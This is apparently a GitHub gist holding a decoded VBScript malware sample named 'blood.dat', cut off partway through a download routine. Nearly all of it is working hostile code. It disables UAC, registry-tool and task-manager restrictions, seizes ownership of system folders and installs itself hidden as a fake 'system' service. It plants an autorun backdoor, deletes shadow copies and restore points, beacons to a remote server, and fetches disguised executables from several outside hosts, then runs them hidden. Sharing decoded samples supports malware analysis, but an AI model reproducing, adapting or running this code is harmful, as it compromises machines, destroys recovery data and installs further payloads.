-
-
Save JohnHammond/c11bd4502a88f1cbe2193db19a953b52 to your computer and use it in GitHub Desktop.
decoded_blood.dat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'''''' | |
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ | |
'''''' ||| v 39.13 ¤ B0t ||| | |
'''''' ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ | |
'''''' | |
' /\ | |
On Error Resume Next | |
wscript.sleep 5000 | |
' /\ | |
'--------------------------------------------------------------------------- | |
' ??????????????? |3yP4ss wscript t!m30ut !!!!!!!!!!!!!!!!! ' | |
'--------------------------------------------------------------------------- | |
' | |
Dim oShell | |
' | |
Dim wscr,rr | |
Set wscr=CreateObject("WScript.Shell") | |
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout") | |
If (rr>=1) Then | |
' | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K REG ADD ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v DisableRegistryTools /t REG_DWORD /d 0 /f & reg add ""HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings"" /v Timeout /t reg_dword /d 0 /f & start "&wscript.Scriptname&" & exit",0 | |
Set oShell = Nothing | |
' | |
Else | |
End If | |
' | |
'----------------------------------------------------------------------- | |
' ~VAR~ ! | |
'----------------------------------------------------------------------- | |
' | |
Dim oFS, NomFichier | |
Set oFS = CreateObject("Scripting.FileSystemObject") | |
NomFichier = oFS.GetAbsolutePathName(""&wscript.Scriptname&"") | |
nom = wscript.Scriptname | |
Set oFS = Nothing | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set WSSH = CreateObject("Wscript.shell") | |
Set wshshell=createobject("wscript.shell") | |
dema=wshshell.expandenvironmentstrings("%allusersprofile%") | |
sys=wshshell.expandenvironmentstrings("%systemroot%") | |
var1=wshshell.expandenvironmentstrings("%systemdrive%") ' R00T + TMP | |
MyF = ""&var1&"\security\blood.dat" | |
' | |
Dim shell | |
Set shell = WScript.CreateObject("WScript.Shell") | |
Set wscr = CreateObject("WScript.Shell") | |
' | |
'--------------------------------------------------------------------------- | |
' servi off | on | |
'--------------------------------------------------------------------------- | |
' | |
Function isServiceRunning(strComputer,strServiceName) | |
Dim objWMIService, strWMIQuery | |
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'" | |
Set objWMIService = GetObject("winmgmts:" _ | |
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") | |
If objWMIService.ExecQuery(strWMIQuery).Count > 0 Then | |
isServiceRunning = TRUE | |
Else | |
isServiceRunning = FALSE | |
End If | |
End Function | |
'option explicit | |
Dim strComputer,strServiceName | |
strComputer = "." ' Local Computer | |
strServiceName = "system" ' Windows Service | |
If isServiceRunning(strComputer,strServiceName) Then | |
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\explorer\sdate\sdate") | |
If (ab >= 39) Then 'Last version | |
Set objWMI = GetObject("winmgmts:root\cimv2") | |
sQuery = "Select * from Win32_process Where Name = 'wscript.exe'" | |
if objWMI.execquery(sQuery).Count >= 2 Then | |
set fsO = CreateObject("Scripting.FileSystemObject") | |
If fsO.FileExists(""&var1&"\security\svchost.exe") Then | |
If fsO.FileExists(""&sys&"\system32\system\msg\config.txt") Then | |
wscript.quit | |
Else | |
End If | |
End If | |
End If | |
End If | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' CMD = on | |
'--------------------------------------------------------------------------- | |
' | |
Dim objShell | |
Dim strMessage, welcome, goodbye | |
' | |
' Set the string values | |
welcome = "DisableCMD" ' New Key | |
goodbye = "HKCU\SOFTWARE\Policies\" _ | |
& "Microsoft\Windows\System\" | |
' | |
' Create the Shell object | |
Set objShell = CreateObject("WScript.Shell") | |
' | |
' These are the two crucial command in this script. | |
objShell.RegWrite goodbye & welcome, 0, "REG_DWORD" | |
' | |
'--------------------------------------------------------------------------- | |
' UAC = 0 + REG = 1 | |
'--------------------------------------------------------------------------- | |
' | |
Set wscr = CreateObject("WScript.Shell") | |
ab = wscr.RegRead("HKLM\software\microsoft\windows\currentversion\policies\system\EnableLUA") | |
If (err.number <> 0 Or ab = 1) Then | |
Const ForReading = 1 , ForWriting = 2 , ForAppending = 8 | |
tmpdir=shell.ExpandEnvironmentStrings("%temp%") | |
nomfichhh=tmpdir & "\uac.bat" | |
' msgbox nomfic | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true) | |
' | |
f.writeline "@echo off" | |
f.writeline "mode con lines=1 cols=14" | |
f.writeline "ver | find /i ""version 6.1."" > nul" | |
f.writeline "if %errorlevel%==0 GoTo patch" | |
f.writeline "ver | find /i ""version 6.0."" > nul" | |
f.writeline "if %errorlevel%==0 GoTo patch" | |
f.writeline ":exit" | |
f.writeline "exit" | |
f.writeline ":patch" | |
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul " | |
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul " | |
' | |
f.writeline "echo Set objshell = createobject(""shell.application"") > ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo Set fsO = createobject(""scripting.filesystemobject"") >> ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo strpath = fso.getparentfoldername(wscript.scriptfullname) >> ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo objshell.shellexecute ""cmd.exe"", ""/c"" ^& Chr(34) ^& strpath ^& ""\CPBA.bat"" ^& Chr(34), """", ""runas"", 0 >> ""%temp%\ADMIN.vbe"" " | |
f.writeline "echo wscript.sleep 1000 >> ""%temp%\ADMIN.vbe"" " | |
' reg = on | |
f.writeline "echo On Error Resume Next >> ""%temp%\tp.vbe"" " | |
f.writeline "echo WScript.CreateObject(""WScript.Shell"").RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"",0, ""REG_DWORD"" >> ""%temp%\tp.vbe"" " | |
f.writeline "echo ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" " | |
f.writeline "echo del/f/q ""%temp%\tp.vbe"" >> ""%temp%\CPBA.bat"" " | |
' | |
f.writeline "echo REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v rescue /d """""""""&dema&"\rescue.vbe"""""""" >> ""%temp%\CPBA.bat"" " | |
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" " | |
f.writeline "echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f ^> nul >> ""%temp%\CPBA.bat"" " | |
f.writeline "start """" /wait ""%temp%\ADMIN.vbe"" " | |
f.writeline " reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua | find /i ""0x0"" >nul " | |
f.writeline " If %errorlevel%==0 GoTo ok " | |
f.writeline " start """"/wait/MAX ""%temp%\uac.bat"" " | |
f.writeline ":ok" | |
f.writeline "if exist ""%temp%\ADMIN.vbe"" del /q /s /f ""%temp%\ADMIN.vbe"" > nul " | |
f.writeline "if exist ""%temp%\CPBA.bat"" del /q /s /f ""%temp%\CPBA.bat"" > nul " | |
f.writeline "EXIT" | |
f.close | |
' | |
Set variable = createobject("wscript.shell") | |
variable.run ""&nomfichhh&"" ,0,true | |
'effacer le tmp | |
fso.DeleteFile nomfichhh, TRUE | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' 0wn3r | |
'--------------------------------------------------------------------------- | |
' | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K takeown /F %systemdrive%\kernel /A /R /D O & CACLS %systemdrive%\Kernel /E /T /C /G %username%:F & takeown /F %systemdrive%\security /A /R /D O & CACLS %systemdrive%\security /E /T /C /G %username%:F & takeown /F ""%allusersprofile%\"" /A /R /D O & takeown /a /f %SystemRoot%\System32\wscript.exe & ICACLS %SystemRoot%\System32\wscript.exe /Grant %username%:F & takeown /F ""%systemdrive%\system Volume Information"" /A /R /D O & CACLS ""%systemdrive%\system Volume Information"" /E /T /C /G %username%:F & EXIT",0 | |
Set oShell = Nothing | |
' | |
'--------------------------------------------------------------------------- | |
' Install me | |
'--------------------------------------------------------------------------- | |
' | |
WScript.CreateObject("Wscript.shell").regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr", 0, "REG_DWORD" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD" | |
' | |
tmpdir=shell.ExpandEnvironmentStrings("%temp%") | |
nomfic=tmpdir & "\tmp.bat" | |
' msgbox nomfic | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(nomfic, ForWriting , true) | |
' | |
f.writeline "for /f ""delims="" %%i in 'type """&var1&"\security\blood.dat""') do set /a Compt+=1 " | |
f.writeline "if '%Compt%' GEQ '24' goto exitt " ' sup ou egal | |
f.writeline "reg add ""HKCR\VBEFile\DefaultIcon"" /v """" /t ""REG_SZ"" /d ""%SystemRoot%\system32\shell32.dll,1"" /f" | |
f.writeline "xcopy /C /H /Y /R """&var1&"\kernel\*.vbe"" ""%temp%\"" " | |
f.writeline "xcopy /C /H /Y /R """&NomFichier&""" ""%temp%\"" " | |
f.writeline "attrib -s -h ""%temp%\"&nom&""" " | |
f.writeline "if Not exist ""%temp%\"&nom&""" GoTo Exit " | |
' | |
f.writeline "for %%E In (B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( del/f/q/A %%E:\config.dat ) " | |
f.writeline "md """&var1&"\Kernel"" " ' R00t3r | |
f.writeline "md """&var1&"\Kernel\\lpt1\\"" " ' NO DEATH dir | |
f.writeline "md """&var1&"\security"" " 'TMP | |
f.writeline "md """&var1&"\security\\lpt1\\"" " ' Idem | |
' | |
f.writeline "attrib +s +h """&var1&"\security"" " | |
f.writeline "attrib +s +h """&var1&"\kernel"" " | |
f.writeline "del/f/q/a """&var1&"\security\*.*"" " | |
f.writeline "del/f/q/a """&var1&"\kernel\*.*"" " | |
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\security\"" " | |
f.writeline "xcopy /C /H /Y /R ""%temp%\"&nom&""" """&var1&"\kernel\"" " | |
f.writeline "del/f/q/a ""%temp%\"&nom&" " | |
f.writeline "ren """&var1&"\kernel\"&nom&""" r00t3r" 'r00t | |
f.writeline "ren """&var1&"\security\"&nom&""" blood.dat " | |
f.writeline "attrib +s +h """&var1&"\kernel\r00t3r"" " | |
' | |
f.writeline ":exit" | |
' | |
f.writeline "cd /d %windir%\wbem" | |
f.writeline "for %i in (*.dll) Do RegSvr32 -s %i" | |
f.writeline "for %i in (*.exe) Do %i /RegServer" | |
f.writeline "EXIT" | |
f.writeline ":exitt" | |
f.close | |
' | |
set variable = createobject("wscript.shell") | |
variable.run ""&nomfic&"" ,0,true | |
'effaces le tmp | |
fso.DeleteFile nomfic, TRUE | |
'--------------------------------------------------------------------------- | |
' R00t3r | |
'--------------------------------------------------------------------------- | |
' | |
Set WshShell = Wscript.CreateObject("Wscript.shell") | |
rep=wshshell.expandenvironmentstrings("%systemdrive%") | |
drv=wshshell.expandenvironmentstrings("%systemroot%") | |
' | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&drv&"\system32\wscript.exe",""&rep&"\security\svchost.exe" | |
' | |
'--------------------------------------------------------------------------- | |
' | |
tmpdir=shell.ExpandEnvironmentStrings("%systemdrive%") | |
nomfichhh=tmpdir & "\security\system.vbs" | |
' msgbox nomfic | |
Set fso = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(nomfichhh, ForWriting , true) | |
' | |
f.writeline " Set variable=createobject(""wscript.shell"") " | |
f.writeline " variable.run ""svchost.exe /e:VBScript.Encode """""&tmpdir&"\security\blood.dat"",false " | |
f.close | |
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\rescue",""""&dema&"\rescue.vbe""", "REG_SZ" | |
Set WshShell = Wscript.CreateObject("Wscript.shell") | |
drv=wshshell.expandenvironmentstrings("%systemroot%") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
' | |
oShell.run "cmd /K md %systemroot%\system32\system & md %systemroot%\system32\system\msg & EXIT",0 | |
Set oShell = Nothing | |
wscript.sleep 3000 | |
Set WshShell = Wscript.CreateObject("Wscript.shell") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /u /K ( @echo DisplayName=msg&@echo Description=Description&@echo ServiceType=272& echo WaitActive=0&@echo StartType=2&@echo ErrorControl=1&@echo Source=%systemdrive%\security\system.vbs&@echo ResetPeriod=0&@echo RebootMsg=&@echo Command=&@echo nActions=0&@ echo Actions=&@echo StartAtTime=OneTime) > %systemroot%\system32\system\msg\config.txt & EXIT",0 | |
Set oShell = Nothing | |
' | |
'---------------------------------------------------------------------------- | |
' | |
Function isServiceRunning(strComputer,strServiceName) | |
Dim objWMIService, strWMIQuery | |
strWMIQuery = "Select * from Win32_Service Where Name = '" & strServiceName & "' and state='Running'" | |
Set objWMIService = GetObject("winmgmts:" _ | |
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") | |
if objWMIService.ExecQuery(strWMIQuery).Count > 0 Then | |
isServiceRunning = TRUE | |
else | |
isServiceRunning = FALSE | |
end If | |
End Function | |
Dim fso, f, f2, ts, ts2 | |
Dim Ligne, i | |
Set FSO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.GetFile(WScript.ScriptFullName) | |
Set ts = f.OpenAsTextStream(1, -2) | |
fso.CreateTextFile ""&drv&"\system32\system\svchost.exe" | |
Set f2 = fso.GetFile(""&drv&"\system32\system\svchost.exe") | |
Set ts2 = f2.OpenAsTextStream(2, -2) | |
For i=1 To 28 | |
ts.skipline | |
Next | |
Do | |
Ligne = ts.readline | |
For i=2 To Len(Ligne) Step 2 | |
ts2.write chr( "&h" & mid(Ligne,i,2)) | |
Next | |
Loop Until ts.AtEndOfStream | |
ts.Close | |
ts2.Close | |
'option explicit | |
strComputer = "." ' Local Computer | |
strServiceName = "system" ' Service N4m3 | |
If isServiceRunning(strComputer,strServiceName) Then | |
Else | |
Set wshshell=createobject("wscript.shell") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K sc create system binPath= ""%systemroot%\System32\system\svchost.exe msg"" start= auto & net start system & sc description system "" processus générique de Windows .Si ce service est arrêté,les services qui en dépendent ne pourront pas démarrer et votre systeme risque 'etre endommagé. "" & EXIT",0 | |
Set oShell = Nothing | |
End If | |
WScript.CreateObject("WScript.Shell").RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate","39", "REG_SZ" | |
' | |
'--------------------------------------------------------------------------- | |
' S3lf D3f3ns3 | |
'--------------------------------------------------------------------------- | |
' /%\ | |
' | |
Dim strRoot, strDelete | |
strRoot = "HKEY_CLASSES_ROOT\lnkfile\IsShortCut" | |
' Create the Shell object | |
Set objShell = CreateObject("WScript.Shell") | |
strDelete = objShell.RegDelete(strRoot) | |
' | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\Notepad2.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\Batfile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command\", "%SystemRoot%\System32\Notepad.exe", "REG_EXPAND_SZ" | |
' | |
' \%/ | |
' | |
'--------------------------------------------------------------------------- | |
' CL34R 0|_|) | |
'--------------------------------------------------------------------------- | |
' | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K del/f/q/s %systemdrive%\security\system.bat & del/f/q/s %systemdrive%\security\system.vbe & del/f/q/s %systemdrive%\security\index.exe & del/f/q/s %systemdrive%\security\system.exe & del/f/q/s %systemdrive%\kernel\explorer.exe & del/f/q/s %systemdrive%\kernel\update.exe & del/f/q/s ""%temp%\reskp.exe"" & rd/q/s %systemdrive%\system32 & rd/q/s %systemdrive%\system & EXIT",0 | |
Set oShell = Nothing | |
' | |
'--------------------------------------------------------------------------- | |
' ResKp /\ | |
'--------------------------------------------------------------------------- | |
' | |
r00t=shell.ExpandEnvironmentStrings("%Allusersprofile%") | |
bkdr=r00t & "\rescue.vbe" | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set f = fso.OpenTextFile(bkdr, ForWriting , true) | |
f.writeline " On Error Resume Next " | |
f.writeline " wscript.sleep 300000 " ' 5 min | |
f.writeline " Set variable=createobject(""wscript.shell"") " | |
f.writeline " variable.run ""%systemroot%\system32\wscript.exe /e:VBScript.Encode """""&var1&"\kernel\r00t3r"",false " | |
f.writeline " wscript.sleep 300000 " '5min | |
f.writeline " Set shell = WScript.CreateObject(""WScript.Shell"") " | |
f.writeline " Set WshShell = Wscript.CreateObject(""Wscript.shell"") " | |
f.writeline " tmpdir=shell.ExpandEnvironmentStrings(""%temp%"") " | |
f.writeline " Set wshshell=createobject(""wscript.shell"") " | |
f.writeline " mane = ""http://sauvegarde.1x.biz/"" " | |
f.writeline " yow = ""booter."" " | |
f.writeline " fin = ""dat"" " | |
f.writeline " strFileURL = "" ""&mane&""""&yow&""""&fin&"" "" " | |
f.writeline " strHDLocation = tmpdir & ""\booter.dat"" " | |
f.writeline " Set objXMLHTTP = CreateObject(""MSXML2.XMLHTTP"") " | |
f.writeline " objXMLHTTP.open ""GET"", strFileURL, FALSE " | |
f.writeline " objXMLHTTP.send() " | |
f.writeline " If objXMLHTTP.Status = 200 Then " | |
f.writeline " Set objADOStream = _ " | |
f.writeline " CreateObject(""ADODB.Stream"") " | |
f.writeline " objADOStream.Open " | |
f.writeline " objADOStream.Type = 1 'adTypeBinary " | |
f.writeline " objADOStream. _ " | |
f.writeline " Write _ " | |
f.writeline " objXMLHTTP _ " | |
f.writeline " .ResponseBody " | |
f.writeline " objADOStream. _ " | |
f.writeline " Position = 0 " | |
f.writeline " Set objFSO = _ " | |
f.writeline " Createobject(""Scripting.FileSystemObject"") " | |
f.writeline " If objFSO. _ " | |
f.writeline " Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation " | |
f.writeline " Set objFSO = Nothing " | |
f.writeline " objADOStream _ " | |
f.writeline " .SaveToFile strHDLocation " | |
f.writeline " objADOStream.Close " | |
f.writeline " Set objADOStream = Nothing " | |
f.writeline " End If " | |
f.writeline " a = objXMLHTTP.getResponseHeader(""Content-Length"") " | |
f.writeline " Set objXMLHTTP = Nothing " | |
'msgbox"2" | |
f.writeline " Set loFSO = CreateObject(""Scripting.FileSystemObject"") " | |
f.writeline " loFSO.CopyFile """"&tmpdir&""\booter.dat"",""""&tmpdir&""\reskp.exe"" " | |
f.writeline " loFSO.DeleteFile """"&tmpdir&""\booter.dat"" " | |
f.writeline " Set oFSO = CreateObject(""Scripting.FileSystemObject"") " | |
f.writeline " stFichier = """"&tmpdir&""\reskp.exe"" " | |
f.writeline " Set oFl = oFSO.GetFile(stFichier) " | |
f.writeline " b = oFl.size " | |
f.writeline " If """"&a&"""" = """"&b&"""" Then " | |
f.writeline " Set variable=createobject(""wscript.shell"") " | |
f.writeline " variable.run """"""""&tmpdir&""\reskp.exe"""""",0,False " | |
f.writeline " Else " | |
f.writeline " End If " | |
f.close | |
'-------------------------------------------------------------------------- | |
' Restaur 0 xp () 7v | |
'-------------------------------------------------------------------------- | |
' /\ | |
On Error Resume Next | |
' \/ | |
Drive = "" ' tous les disques' | |
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore") | |
ret=obj.Disable(Drive) | |
Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore") | |
ret=obj.Enable(Drive) | |
ret=obj.Enable(Drive) | |
Set obj = Nothing | |
' | |
Set wshshell=createobject("wscript.shell") | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K vssadmin delete shadows /all /quiet & cd/d ""%systemdrive%\system volume Information"" & del/f/s/q/a ""%systemdrive%\system volume Information\*.*"" & EXIT",0 | |
Set oShell = Nothing | |
' | |
'--------------------------------------------------------------------------- | |
' \/\/0Rm_._S4t/\N | |
'--------------------------------------------------------------------------- | |
' | |
prem = TotalTime | |
deux = Start | |
dern = PauseTime | |
' | |
While TRUE | |
dern = 3600 ' Déclenchement / 1H' | |
deux = Timer ' H début. | |
Do While Timer < deux + dern | |
' | |
detecterracines | |
wscript.sleep 1000 | |
' | |
Loop | |
'LANCEMENT | |
' | |
'--------------------------------------------------------------------------- | |
' C0mPtM3 & Def3nd3r m! | |
'--------------------------------------------------------------------------- | |
' | |
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD" | |
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" | |
' | |
On Error Resume Next | |
Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP") | |
urlCert = "http://registered.co.nf/sat39/index.php" | |
xmlHttp.Open "GET", urlCert, FALSE | |
xmlHttp.Send "" | |
xmlHttp.Abort | |
' | |
'--------------------------------------------------------------------------- | |
' Z0n3H | |
'--------------------------------------------------------------------------- | |
' | |
Set wshshell=createobject("wscript.shell") | |
first = "http://zoneh.me.pn/" | |
secon = "zoneh." | |
ext = "dat" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"zoneh.dat",""&third&"zoneh.exe" | |
loFSO.DeleteFile ""&third&"zoneh.dat" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"zoneh.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\zoneh.exe""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' BUMP | |
'--------------------------------------------------------------------------- | |
' | |
Set wshshell=createobject("wscript.shell") | |
first = "http://users2.Jabry.com/mysiteweb2/" | |
secon = "bump." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"bump.jpg",""&third&"bump.vbe" | |
loFSO.DeleteFile ""&third&"bump.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"bump.vbe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\bump.vbe""",0,False | |
Else | |
End If | |
'--------------------------------------------------------------------------- | |
' AV 0 | |
'--------------------------------------------------------------------------- | |
' | |
Set wshshell=createobject("wscript.shell") | |
first = "http://newsonline.125mb.com/" | |
secon = "av." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"av.jpg",""&third&"av.bat" | |
loFSO.DeleteFile ""&third&"av.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"av.bat" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\av.bat""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' system . x | |
'--------------------------------------------------------------------------- | |
Set wshshell=createobject("wscript.shell") | |
first = "http://mysiteweb.eu5.org/" | |
secon = "system." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"system.jpg",""&third&"system.exe" | |
loFSO.DeleteFile ""&third&"system.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"system.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\system.exe""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' explorer . x | |
'--------------------------------------------------------------------------- | |
Set wshshell=createobject("wscript.shell") | |
first = "http://mysiteweb.freezoy.com" | |
secon = "explorer." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
